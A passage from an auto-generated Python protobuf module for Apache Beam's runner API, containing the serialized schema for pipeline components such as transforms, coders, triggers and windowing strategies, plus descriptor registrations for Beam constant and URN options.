\x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.Components\x12\x1a\n\x12root_transform_ids\x18\x02 \x03(\t\x12\x44\n\x0c\x64isplay_data\x18\x03 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.DisplayData\"\xb4\x03\n\nPTransform\x12\x13\n\x0bunique_name\x18\x05 \x01(\t\x12=\n\x04spec\x18\x01 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.FunctionSpec\x12\x15\n\rsubtransforms\x18\x02 \x03(\t\x12I\n\x06inputs\x18\x03 \x03(\x0b\x32\x39.org.apache.beam.model.pipeline.v1.PTransform.InputsEntry\x12K\n\x07outputs\x18\x04 \x03(\x0b\x32:.org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry\x12\x44\n\x0c\x64isplay_data\x18\x06 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.DisplayData\x1a-\n\x0bInputsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1a.\n\x0cOutputsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"\xd0\r\n\x13StandardPTransforms\"\xb1\x03\n\nPrimitives\x12-\n\x06PAR_DO\x10\x00\x1a!\xa2\xb4\xfa\xc2\x05\x1burn:beam:transform:pardo:v1\x12,\n\x07\x46LATTEN\x10\x01\x1a\x1f\xa2\xb4\xfa\xc2\x05\x19\x62\x65\x61m:transform:flatten:v1\x12\x36\n\x0cGROUP_BY_KEY\x10\x02\x1a$\xa2\xb4\xfa\xc2\x05\x1e\x62\x65\x61m:transform:group_by_key:v1\x12,\n\x07IMPULSE\x10\x03\x1a\x1f\xa2\xb4\xfa\xc2\x05\x19\x62\x65\x61m:transform:impulse:v1\x12\x37\n\x0e\x41SSIGN_WINDOWS\x10\x04\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:transform:window_into:v1\x12\x37\n\x0bTEST_STREAM\x10\x05\x1a&\xa2\xb4\xfa\xc2\x05 
urn:beam:transform:teststream:v1\x12\x34\n\x0bMAP_WINDOWS\x10\x06\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:transform:map_windows:v1\x12\x38\n\rMERGE_WINDOWS\x10\x07\x1a%\xa2\xb4\xfa\xc2\x05\x1f\x62\x65\x61m:transform:merge_windows:v1\"t\n\x14\x44\x65precatedPrimitives\x12&\n\x04READ\x10\x00\x1a\x1c\xa2\xb4\xfa\xc2\x05\x16\x62\x65\x61m:transform:read:v1\x12\x34\n\x0b\x43REATE_VIEW\x10\x01\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:transform:create_view:v1\"\xf2\x01\n\nComposites\x12<\n\x0f\x43OMBINE_PER_KEY\x10\x00\x1a\'\xa2\xb4\xfa\xc2\x05!beam:transform:combine_per_key:v1\x12>\n\x10\x43OMBINE_GLOBALLY\x10\x01\x1a(\xa2\xb4\xfa\xc2\x05\"beam:transform:combine_globally:v1\x12\x30\n\tRESHUFFLE\x10\x02\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:transform:reshuffle:v1\x12\x34\n\x0bWRITE_FILES\x10\x03\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:transform:write_files:v1\"\xd3\x04\n\x11\x43ombineComponents\x12:\n\x0e\x43OMBINE_PGBKCV\x10\x00\x1a&\xa2\xb4\xfa\xc2\x05 beam:transform:combine_pgbkcv:v1\x12R\n\x1a\x43OMBINE_MERGE_ACCUMULATORS\x10\x01\x1a\x32\xa2\xb4\xfa\xc2\x05,beam:transform:combine_merge_accumulators:v1\x12L\n\x17\x43OMBINE_EXTRACT_OUTPUTS\x10\x02\x1a/\xa2\xb4\xfa\xc2\x05)beam:transform:combine_extract_outputs:v1\x12R\n\x1a\x43OMBINE_PER_KEY_PRECOMBINE\x10\x03\x1a\x32\xa2\xb4\xfa\xc2\x05,beam:transform:combine_per_key_precombine:v1\x12\x62\n\"COMBINE_PER_KEY_MERGE_ACCUMULATORS\x10\x04\x1a:\xa2\xb4\xfa\xc2\x05\x34\x62\x65\x61m:transform:combine_per_key_merge_accumulators:v1\x12\\\n\x1f\x43OMBINE_PER_KEY_EXTRACT_OUTPUTS\x10\x05\x1a\x37\xa2\xb4\xfa\xc2\x05\x31\x62\x65\x61m:transform:combine_per_key_extract_outputs:v1\x12J\n\x16\x43OMBINE_GROUPED_VALUES\x10\x06\x1a.\xa2\xb4\xfa\xc2\x05(beam:transform:combine_grouped_values:v1\"\xc3\x02\n\x19SplittableParDoComponents\x12L\n\x15PAIR_WITH_RESTRICTION\x10\x00\x1a\x31\xa2\xb4\xfa\xc2\x05+beam:transform:sdf_pair_with_restriction:v1\x12\x44\n\x11SPLIT_RESTRICTION\x10\x01\x1a-\xa2\xb4\xfa\xc2\x05\'beam:transform:sdf_split_restriction:v1\x12N\n\x16PROCESS_KEYED_ELEMENTS\x10\x02\x1a\x32\xa2\xb4\xfa\xc2\x05,beam:transform:sdf_process_keyed_elements:v1\x12\x42\n\x10PROCESS_ELEMENTS\x10\x03\x1a,\xa2\xb4\xfa\xc2\x05&beam:transform:sdf_process_elements:v1\"\x82\x01\n\x16StandardSideInputTypes\"h\n\x04\x45num\x12/\n\x08ITERABLE\x10\x00\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:side_input:iterable:v1\x12/\n\x08MULTIMAP\x10\x01\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:side_input:multimap:v1\"\xe0\x01\n\x0bPCollection\x12\x13\n\x0bunique_name\x18\x01 \x01(\t\x12\x10\n\x08\x63oder_id\x18\x02 \x01(\t\x12\x45\n\nis_bounded\x18\x03 \x01(\x0e\x32\x31.org.apache.beam.model.pipeline.v1.IsBounded.Enum\x12\x1d\n\x15windowing_strategy_id\x18\x04 \x01(\t\x12\x44\n\x0c\x64isplay_data\x18\x05 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.DisplayData\"\x89\x06\n\x0cParDoPayload\x12\x41\n\x05\x64o_fn\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12@\n\nparameters\x18\x02 \x03(\x0b\x32,.org.apache.beam.model.pipeline.v1.Parameter\x12T\n\x0bside_inputs\x18\x03 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry\x12T\n\x0bstate_specs\x18\x04 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry\x12T\n\x0btimer_specs\x18\x05 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry\x12\x12\n\nsplittable\x18\x06 \x01(\x08\x12\x1c\n\x14restriction_coder_id\x18\x07 \x01(\t\x12\x1d\n\x15requests_finalization\x18\x08 \x01(\x08\x1a_\n\x0fSideInputsEntry\x12\x0b\n\x03key\x18\x01 
\x01(\t\x12;\n\x05value\x18\x02 \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.SideInput:\x02\x38\x01\x1a_\n\x0fStateSpecsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12;\n\x05value\x18\x02 \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.StateSpec:\x02\x38\x01\x1a_\n\x0fTimerSpecsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12;\n\x05value\x18\x02 \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.TimerSpec:\x02\x38\x01\"\xad\x01\n\tParameter\x12\x44\n\x04type\x18\x01 \x01(\x0e\x32\x36.org.apache.beam.model.pipeline.v1.Parameter.Type.Enum\x1aZ\n\x04Type\"R\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\n\n\x06WINDOW\x10\x01\x12\x14\n\x10PIPELINE_OPTIONS\x10\x02\x12\x17\n\x13RESTRICTION_TRACKER\x10\x03\"\xfc\x02\n\tStateSpec\x12G\n\nvalue_spec\x18\x01 \x01(\x0b\x32\x31.org.apache.beam.model.pipeline.v1.ValueStateSpecH\x00\x12\x43\n\x08\x62\x61g_spec\x18\x02 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.BagStateSpecH\x00\x12O\n\x0e\x63ombining_spec\x18\x03 \x01(\x0b\x32\x35.org.apache.beam.model.pipeline.v1.CombiningStateSpecH\x00\x12\x43\n\x08map_spec\x18\x04 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.MapStateSpecH\x00\x12\x43\n\x08set_spec\x18\x05 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.SetStateSpecH\x00\x42\x06\n\x04spec\"\"\n\x0eValueStateSpec\x12\x10\n\x08\x63oder_id\x18\x01 \x01(\t\"(\n\x0c\x42\x61gStateSpec\x12\x18\n\x10\x65lement_coder_id\x18\x01 \x01(\t\"z\n\x12\x43ombiningStateSpec\x12\x1c\n\x14\x61\x63\x63umulator_coder_id\x18\x01 \x01(\t\x12\x46\n\ncombine_fn\x18\x02 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\"<\n\x0cMapStateSpec\x12\x14\n\x0ckey_coder_id\x18\x01 \x01(\t\x12\x16\n\x0evalue_coder_id\x18\x02 \x01(\t\"(\n\x0cSetStateSpec\x12\x18\n\x10\x65lement_coder_id\x18\x01 \x01(\t\"l\n\tTimerSpec\x12G\n\x0btime_domain\x18\x01 \x01(\x0e\x32\x32.org.apache.beam.model.pipeline.v1.TimeDomain.Enum\x12\x16\n\x0etimer_coder_id\x18\x02 \x01(\t\"@\n\tIsBounded\"3\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\r\n\tUNBOUNDED\x10\x01\x12\x0b\n\x07\x42OUNDED\x10\x02\"\x98\x01\n\x0bReadPayload\x12\x42\n\x06source\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12\x45\n\nis_bounded\x18\x02 \x01(\x0e\x32\x31.org.apache.beam.model.pipeline.v1.IsBounded.Enum\"Z\n\x11WindowIntoPayload\x12\x45\n\twindow_fn\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\"v\n\x0e\x43ombinePayload\x12\x46\n\ncombine_fn\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12\x1c\n\x14\x61\x63\x63umulator_coder_id\x18\x02 \x01(\t\"\xca\x05\n\x11TestStreamPayload\x12\x10\n\x08\x63oder_id\x18\x01 \x01(\t\x12J\n\x06\x65vents\x18\x02 \x03(\x0b\x32:.org.apache.beam.model.pipeline.v1.TestStreamPayload.Event\x1a\x94\x04\n\x05\x45vent\x12\x66\n\x0fwatermark_event\x18\x01 \x01(\x0b\x32K.org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceWatermarkH\x00\x12q\n\x15processing_time_event\x18\x02 \x01(\x0b\x32P.org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceProcessingTimeH\x00\x12_\n\relement_event\x18\x03 \x01(\x0b\x32\x46.org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AddElementsH\x00\x1a)\n\x10\x41\x64vanceWatermark\x12\x15\n\rnew_watermark\x18\x01 \x01(\x03\x1a\x31\n\x15\x41\x64vanceProcessingTime\x12\x18\n\x10\x61\x64vance_duration\x18\x01 \x01(\x03\x1ah\n\x0b\x41\x64\x64\x45lements\x12Y\n\x08\x65lements\x18\x01 
\x03(\x0b\x32G.org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElementB\x07\n\x05\x65vent\x1a@\n\x12TimestampedElement\x12\x17\n\x0f\x65ncoded_element\x18\x01 \x01(\x0c\x12\x11\n\ttimestamp\x18\x02 \x01(\x03\"\x9b\x03\n\x11WriteFilesPayload\x12@\n\x04sink\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12K\n\x0f\x66ormat_function\x18\x02 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12\x17\n\x0fwindowed_writes\x18\x03 \x01(\x08\x12\"\n\x1arunner_determined_sharding\x18\x04 \x01(\x08\x12Y\n\x0bside_inputs\x18\x05 \x03(\x0b\x32\x44.org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry\x1a_\n\x0fSideInputsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12;\n\x05value\x18\x02 \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.SideInput:\x02\x38\x01\"f\n\x05\x43oder\x12@\n\x04spec\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12\x1b\n\x13\x63omponent_coder_ids\x18\x02 \x03(\t\"\xb7\x03\n\x0eStandardCoders\"\xa4\x03\n\x04\x45num\x12$\n\x05\x42YTES\x10\x00\x1a\x19\xa2\xb4\xfa\xc2\x05\x13\x62\x65\x61m:coder:bytes:v1\x12\x1e\n\x02KV\x10\x01\x1a\x16\xa2\xb4\xfa\xc2\x05\x10\x62\x65\x61m:coder:kv:v1\x12&\n\x06VARINT\x10\x02\x1a\x1a\xa2\xb4\xfa\xc2\x05\x14\x62\x65\x61m:coder:varint:v1\x12*\n\x08ITERABLE\x10\x03\x1a\x1c\xa2\xb4\xfa\xc2\x05\x16\x62\x65\x61m:coder:iterable:v1\x12$\n\x05TIMER\x10\x04\x1a\x19\xa2\xb4\xfa\xc2\x05\x13\x62\x65\x61m:coder:timer:v1\x12\x38\n\x0fINTERVAL_WINDOW\x10\x05\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:coder:interval_window:v1\x12\x34\n\rLENGTH_PREFIX\x10\x06\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:coder:length_prefix:v1\x12\x34\n\rGLOBAL_WINDOW\x10\x07\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:coder:global_window:v1\x12\x36\n\x0eWINDOWED_VALUE\x10\x08\x1a\"\xa2\xb4\xfa\xc2\x05\x1c\x62\x65\x61m:coder:windowed_value:v1\"\xf5\x04\n\x11WindowingStrategy\x12\x45\n\twindow_fn\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12I\n\x0cmerge_status\x18\x02 \x01(\x0e\x32\x33.org.apache.beam.model.pipeline.v1.MergeStatus.Enum\x12\x17\n\x0fwindow_coder_id\x18\x03 \x01(\t\x12;\n\x07trigger\x18\x04 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x12S\n\x11\x61\x63\x63umulation_mode\x18\x05 \x01(\x0e\x32\x38.org.apache.beam.model.pipeline.v1.AccumulationMode.Enum\x12G\n\x0boutput_time\x18\x06 \x01(\x0e\x32\x32.org.apache.beam.model.pipeline.v1.OutputTime.Enum\x12Q\n\x10\x63losing_behavior\x18\x07 \x01(\x0e\x32\x37.org.apache.beam.model.pipeline.v1.ClosingBehavior.Enum\x12\x18\n\x10\x61llowed_lateness\x18\x08 \x01(\x03\x12N\n\x0eOnTimeBehavior\x18\t \x01(\x0e\x32\x36.org.apache.beam.model.pipeline.v1.OnTimeBehavior.Enum\x12\x1d\n\x15\x61ssigns_to_one_window\x18\n 
\x01(\x08\"\\\n\x0bMergeStatus\"M\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0f\n\x0bNON_MERGING\x10\x01\x12\x0f\n\x0bNEEDS_MERGE\x10\x02\x12\x12\n\x0e\x41LREADY_MERGED\x10\x03\"M\n\x10\x41\x63\x63umulationMode\"9\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0e\n\nDISCARDING\x10\x01\x12\x10\n\x0c\x41\x43\x43UMULATING\x10\x02\"Q\n\x0f\x43losingBehavior\">\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0f\n\x0b\x45MIT_ALWAYS\x10\x01\x12\x14\n\x10\x45MIT_IF_NONEMPTY\x10\x02\"P\n\x0eOnTimeBehavior\">\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0f\n\x0b\x46IRE_ALWAYS\x10\x01\x12\x14\n\x10\x46IRE_IF_NONEMPTY\x10\x02\"b\n\nOutputTime\"T\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x11\n\rEND_OF_WINDOW\x10\x01\x12\x12\n\x0eLATEST_IN_PANE\x10\x02\x12\x14\n\x10\x45\x41RLIEST_IN_PANE\x10\x03\"l\n\nTimeDomain\"^\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0e\n\nEVENT_TIME\x10\x01\x12\x13\n\x0fPROCESSING_TIME\x10\x02\x12 \n\x1cSYNCHRONIZED_PROCESSING_TIME\x10\x03\"\x82\x0e\n\x07Trigger\x12H\n\tafter_all\x18\x01 \x01(\x0b\x32\x33.org.apache.beam.model.pipeline.v1.Trigger.AfterAllH\x00\x12H\n\tafter_any\x18\x02 \x01(\x0b\x32\x33.org.apache.beam.model.pipeline.v1.Trigger.AfterAnyH\x00\x12J\n\nafter_each\x18\x03 \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.Trigger.AfterEachH\x00\x12Z\n\x13\x61\x66ter_end_of_window\x18\x04 \x01(\x0b\x32;.org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindowH\x00\x12_\n\x15\x61\x66ter_processing_time\x18\x05 \x01(\x0b\x32>.org.apache.beam.model.pipeline.v1.Trigger.AfterProcessingTimeH\x00\x12x\n\"after_synchronized_processing_time\x18\x06 \x01(\x0b\x32J.org.apache.beam.model.pipeline.v1.Trigger.AfterSynchronizedProcessingTimeH\x00\x12\x43\n\x06\x61lways\x18\x0c \x01(\x0b\x32\x31.org.apache.beam.model.pipeline.v1.Trigger.AlwaysH\x00\x12\x45\n\x07\x64\x65\x66\x61ult\x18\x07 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.Trigger.DefaultH\x00\x12P\n\relement_count\x18\x08 \x01(\x0b\x32\x37.org.apache.beam.model.pipeline.v1.Trigger.ElementCountH\x00\x12\x41\n\x05never\x18\t \x01(\x0b\x32\x30.org.apache.beam.model.pipeline.v1.Trigger.NeverH\x00\x12J\n\nor_finally\x18\n \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.Trigger.OrFinallyH\x00\x12\x43\n\x06repeat\x18\x0b \x01(\x0b\x32\x31.org.apache.beam.model.pipeline.v1.Trigger.RepeatH\x00\x1aK\n\x08\x41\x66terAll\x12?\n\x0bsubtriggers\x18\x01 \x03(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1aK\n\x08\x41\x66terAny\x12?\n\x0bsubtriggers\x18\x01 \x03(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1aL\n\tAfterEach\x12?\n\x0bsubtriggers\x18\x01 \x03(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1a\x97\x01\n\x10\x41\x66terEndOfWindow\x12\x41\n\rearly_firings\x18\x01 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x12@\n\x0clate_firings\x18\x02 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1aj\n\x13\x41\x66terProcessingTime\x12S\n\x14timestamp_transforms\x18\x01 \x03(\x0b\x32\x35.org.apache.beam.model.pipeline.v1.TimestampTransform\x1a!\n\x1f\x41\x66terSynchronizedProcessingTime\x1a\t\n\x07\x44\x65\x66\x61ult\x1a%\n\x0c\x45lementCount\x12\x15\n\relement_count\x18\x01 \x01(\x05\x1a\x07\n\x05Never\x1a\x08\n\x06\x41lways\x1a\x82\x01\n\tOrFinally\x12\x38\n\x04main\x18\x01 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x12;\n\x07\x66inally\x18\x02 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1aH\n\x06Repeat\x12>\n\nsubtrigger\x18\x01 
\x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.TriggerB\t\n\x07trigger\"\x96\x02\n\x12TimestampTransform\x12L\n\x05\x64\x65lay\x18\x01 \x01(\x0b\x32;.org.apache.beam.model.pipeline.v1.TimestampTransform.DelayH\x00\x12Q\n\x08\x61lign_to\x18\x02 \x01(\x0b\x32=.org.apache.beam.model.pipeline.v1.TimestampTransform.AlignToH\x00\x1a\x1d\n\x05\x44\x65lay\x12\x14\n\x0c\x64\x65lay_millis\x18\x01 \x01(\x03\x1a)\n\x07\x41lignTo\x12\x0e\n\x06period\x18\x03 \x01(\x03\x12\x0e\n\x06offset\x18\x04 \x01(\x03\x42\x15\n\x13timestamp_transform\"\xe8\x01\n\tSideInput\x12G\n\x0e\x61\x63\x63\x65ss_pattern\x18\x01 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.FunctionSpec\x12\x43\n\x07view_fn\x18\x02 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12M\n\x11window_mapping_fn\x18\x03 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\"8\n\x0b\x45nvironment\x12\x0b\n\x03url\x18\x01 \x01(\t\x12\x0b\n\x03urn\x18\x02 \x01(\t\x12\x0f\n\x07payload\x18\x03 \x01(\x0c\"\x9f\x01\n\x14StandardEnvironments\"\x86\x01\n\x0c\x45nvironments\x12$\n\x06\x44OCKER\x10\x00\x1a\x18\xa2\xb4\xfa\xc2\x05\x12\x62\x65\x61m:env:docker:v1\x12&\n\x07PROCESS\x10\x01\x1a\x19\xa2\xb4\xfa\xc2\x05\x13\x62\x65\x61m:env:process:v1\x12(\n\x08\x45XTERNAL\x10\x02\x1a\x1a\xa2\xb4\xfa\xc2\x05\x14\x62\x65\x61m:env:external:v1\"(\n\rDockerPayload\x12\x17\n\x0f\x63ontainer_image\x18\x01 \x01(\t\"\xb0\x01\n\x0eProcessPayload\x12\n\n\x02os\x18\x01 \x01(\t\x12\x0c\n\x04\x61rch\x18\x02 \x01(\t\x12\x0f\n\x07\x63ommand\x18\x03 \x01(\t\x12G\n\x03\x65nv\x18\x04 \x03(\x0b\x32:.org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry\x1a*\n\x08\x45nvEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"h\n\x0fSdkFunctionSpec\x12=\n\x04spec\x18\x01 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.FunctionSpec\x12\x16\n\x0e\x65nvironment_id\x18\x02 \x01(\t\",\n\x0c\x46unctionSpec\x12\x0b\n\x03urn\x18\x01 \x01(\t\x12\x0f\n\x07payload\x18\x03 \x01(\x0c\"\xa1\x04\n\x0b\x44isplayData\x12\x42\n\x05items\x18\x01 \x03(\x0b\x32\x33.org.apache.beam.model.pipeline.v1.DisplayData.Item\x1a\x46\n\nIdentifier\x12\x14\n\x0ctransform_id\x18\x01 \x01(\t\x12\x15\n\rtransform_urn\x18\x02 \x01(\t\x12\x0b\n\x03key\x18\x03 \x01(\t\x1a\x86\x02\n\x04Item\x12\x45\n\x02id\x18\x01 \x01(\x0b\x32\x39.org.apache.beam.model.pipeline.v1.DisplayData.Identifier\x12\x46\n\x04type\x18\x02 \x01(\x0e\x32\x38.org.apache.beam.model.pipeline.v1.DisplayData.Type.Enum\x12#\n\x05value\x18\x03 \x01(\x0b\x32\x14.google.protobuf.Any\x12)\n\x0bshort_value\x18\x04 \x01(\x0b\x32\x14.google.protobuf.Any\x12\r\n\x05label\x18\x05 \x01(\t\x12\x10\n\x08link_url\x18\x06 \x01(\t\x1a}\n\x04Type\"u\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\n\n\x06STRING\x10\x01\x12\x0b\n\x07INTEGER\x10\x02\x12\t\n\x05\x46LOAT\x10\x03\x12\x0b\n\x07\x42OOLEAN\x10\x04\x12\r\n\tTIMESTAMP\x10\x05\x12\x0c\n\x08\x44URATION\x10\x06\x12\x0e\n\nJAVA_CLASS\x10\x07\"\x92\x07\n\x15MessageWithComponents\x12\x41\n\ncomponents\x18\x01 \x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.Components\x12\x39\n\x05\x63oder\x18\x02 \x01(\x0b\x32(.org.apache.beam.model.pipeline.v1.CoderH\x00\x12L\n\x0f\x63ombine_payload\x18\x03 \x01(\x0b\x32\x31.org.apache.beam.model.pipeline.v1.CombinePayloadH\x00\x12O\n\x11sdk_function_spec\x18\x04 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpecH\x00\x12I\n\x0epar_do_payload\x18\x06 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.ParDoPayloadH\x00\x12\x43\n\nptransform\x18\x07 
\x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.PTransformH\x00\x12\x45\n\x0bpcollection\x18\x08 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.PCollectionH\x00\x12\x46\n\x0cread_payload\x18\t \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.ReadPayloadH\x00\x12\x42\n\nside_input\x18\x0b \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.SideInputH\x00\x12S\n\x13window_into_payload\x18\x0c \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.WindowIntoPayloadH\x00\x12R\n\x12windowing_strategy\x18\r \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.WindowingStrategyH\x00\x12H\n\rfunction_spec\x18\x0e \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.FunctionSpecH\x00\x42\x06\n\x04root\"\x86\x05\n\x16\x45xecutableStagePayload\x12\x43\n\x0b\x65nvironment\x18\x01 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.Environment\x12\r\n\x05input\x18\x02 \x01(\t\x12Z\n\x0bside_inputs\x18\x03 \x03(\x0b\x32\x45.org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId\x12\x12\n\ntransforms\x18\x04 \x03(\t\x12\x0f\n\x07outputs\x18\x05 \x03(\t\x12\x41\n\ncomponents\x18\x06 \x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.Components\x12Z\n\x0buser_states\x18\x07 \x03(\x0b\x32\x45.org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId\x12Q\n\x06timers\x18\x08 \x03(\x0b\x32\x41.org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId\x1a\x37\n\x0bSideInputId\x12\x14\n\x0ctransform_id\x18\x01 \x01(\t\x12\x12\n\nlocal_name\x18\x02 \x01(\t\x1a\x37\n\x0bUserStateId\x12\x14\n\x0ctransform_id\x18\x01 \x01(\t\x12\x12\n\nlocal_name\x18\x02 \x01(\t\x1a\x33\n\x07TimerId\x12\x14\n\x0ctransform_id\x18\x01 \x01(\t\x12\x12\n\nlocal_name\x18\x02 \x01(\t:6\n\x08\x62\x65\x61m_urn\x12!.google.protobuf.EnumValueOptions\x18\xc4\xa6\xafX \x01(\t:;\n\rbeam_constant\x12!.google.protobuf.EnumValueOptions\x18\xc5\xa6\xafX \x01(\tB;\n!org.apache.beam.model.pipeline.v1B\tRunnerApiZ\x0bpipeline_v1b\x06proto3')
,
dependencies=[google_dot_protobuf_dot_any__pb2.DESCRIPTOR,google_dot_protobuf_dot_descriptor__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
BEAM_URN_FIELD_NUMBER = 185324356
beam_urn = _descriptor.FieldDescriptor(
name='beam_urn', full_name='org.apache.beam.model.pipeline.v1.beam_urn', index=0,
number=185324356, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=True, extension_scope=None,
options=None)
BEAM_CONSTANT_FIELD_NUMBER = 185324357
beam_constant = _descriptor.FieldDescriptor(
name='beam_constant', full_name='org.apache.beam.model.pipeline.v1.beam_constant', index=1,
number=185324357, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=True, extension_scope=None,
options=None)
_BEAMCONSTANTS_CONSTANTS = _descriptor.EnumDescriptor(
name='Constants',
full_name='org.apache.beam.model.pipeline.v1.BeamConstants.Constants',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='MIN_TIMESTAMP_MILLIS', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\021-9223372036854775')),
type=None),
_descriptor.EnumValueDescriptor(
name='MAX_TIMESTAMP_MILLIS', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\0209223372036854775')),
type=None),
_descriptor.EnumValueDescriptor(
name='GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\0209223371950454775')),
type=None),
],
containing_type=None,
options=None,
serialized_start=140,
serialized_end=316,
)
_sym_db.RegisterEnumDescriptor(_BEAMCONSTANTS_CONSTANTS)
_STANDARDPTRANSFORMS_PRIMITIVES = _descriptor.EnumDescriptor(
name='Primitives',
